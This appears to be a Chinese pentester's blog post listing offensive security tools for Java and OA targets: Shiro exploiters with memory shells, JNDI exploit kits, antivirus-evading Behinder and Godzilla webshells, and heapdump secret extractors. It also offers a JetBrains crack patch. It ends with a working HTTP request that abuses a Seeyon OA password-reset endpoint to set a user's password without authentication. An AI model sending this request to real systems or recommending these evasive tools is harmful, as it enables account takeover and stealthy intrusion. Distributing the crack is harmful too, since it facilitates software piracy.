Quan

1.用友系列
GUI版本
用友NC因为禁用了很多类，不是那么容易直接回显和打内存马，这款工具解决了这点
命令行版
无漏洞利用
2.OA综合利用
Thelostworld_OA.jar
Github搜即可
3.Shiro
之前收集了很多的shiro工具，这里作者推荐老牌工具
ShiroAttack2
这工具还有个再次加强版，作者的描述
增加Suo5 v0.8.0内存马
 增加UpgradeMemshell内存马
 增加内存马自定义payload key选项，消除工具特征
 消除内存马pass、path特征
ShiroAttack2再次加强版
4.IIS短文件名猜解工具
IIS-ShortName-Scanner
5.JAR包分析工具
jar-analyzer-gui
6.mysql恶意服务端
mysql-fake-server
7.JNDI Expolit
JNDIExploit-1
8.数据库综合利用工具
但MSSQL我还是选择SharpSQLTools
MDUT
9.流量分析工具
BlueTeamTools
10.两个免杀Webshell的工具
但是好像有些是秒杀马
ByPassBehinder4J
ByPassGodzilla
11.JDBC链接提取工具
InjectJDBC
12.哥斯拉内存马
GodzillaMemoryShellProject
13.HeapDump
heapdump提取工具，命令行
以前的heapdump都是用MemoryAnalyzer人工分析，非常折磨，现在可以一键提取出有用信息了。
JDumpSpider

该文章主要分析了一下哥斯拉的从生成Webshell到连接Webshell的过程

内附有多个OA的利用工具，后门未知，虚拟机使用。
下载

最近装JB全家桶，祭出我收藏已久的一些东西
破解补丁
Windows先点击uninstall再点击install
之后直接输入这些激活码就行，激活码太长了，我也放到服务器上，自取
phpstorm
idea
goland
pycharm

我实在没想到，2023年居然还有这种漏洞的存在...我啥时候也能挖掘这么个漏洞出来哇...
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip

{"loginName":"XXX321123XXX”,”password":"123456"}